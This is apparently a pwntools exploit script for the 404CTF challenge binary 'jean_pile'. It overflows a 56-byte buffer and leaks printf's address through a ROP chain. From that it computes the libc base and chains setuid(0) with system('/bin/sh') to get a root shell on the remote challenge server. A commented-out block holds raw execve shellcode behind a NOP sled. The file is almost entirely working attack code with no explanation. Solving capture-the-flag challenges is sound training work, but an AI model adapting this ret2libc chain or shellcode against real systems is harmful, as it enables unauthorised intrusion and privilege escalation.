from pwn import * """ gdbscript="b *service+340" with gdb.debug("./jean_pile",setuid=False,aslr=False,gdbscript=gdbscript) as target: """ def get_plat(target): print(target.recvuntil(b">>> ").decode()) target.sendline(b"1") def choix_plat(target,payload): print(target.recvuntil(b">> ").decode()) target.sendline(payload) #target = process("./jean_pile") target = remote('challenges.404ctf.fr',31957) # Stage 1 (Leaking the address of printf@GLIBC) #objdump -d jean_pile | grep _start plt_main = p64(0x4006e0) plt_put = p64(0x400660) got_printf = p64(0x602020) #ROPgadget --binary jean_pile | grep "pop rdi" pop_rdi = p64(0x400b83) junk = b"A" * 56 # Create the payload. This will print the address of printf to stdout and jump back to the main function. payload = junk + pop_rdi + got_printf + plt_put + plt_main # Send the payload, parse the printed address and store it. get_plat(target) choix_plat(target, payload) leaked_printf = target.recv()[:6].strip().ljust(8, b"\00") leaked_printf = u64(leaked_printf) log.success("Leaked printf@GLIBC: " + hex(leaked_printf)) """ charge = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" addr= 0x7ffec23bdc10 payload = b"A"*56+p64(addr)+b"\x90"*(136-len(charge))+charge target.interactive() """ # Stage 2 (Obtaining the addresses and pwning) #readelf -s libc6-amd64_2.36-9+deb12u4_i386.so | grep print libc_printf = 0x525b0 libc_sys = 0x4c490 libc_exit = 0x3e680 libc_setuid = 0xd54b0 #strings -a -t x libc6-amd64_2.36-9+deb12u4_i386.so | grep /bin/sh libc_sh = 0x196031 # Calculate the the base address of libc libc_main = leaked_printf - libc_printf log.success("libc_main:" + hex(libc_main)) # Add the offsets to the base address to obtain the addresses libc functions sys = p64(libc_main + libc_sys) sh = p64(libc_main + libc_sh) setuid = p64(libc_main + libc_setuid) # Setting 0 as the first argument to setuid will escalate to root priviliges root = p64(0) payload = junk + pop_rdi + root + setuid + pop_rdi + sh + sys #get_plat(target) target.sendline(b"1") choix_plat(target, payload) target.interactive()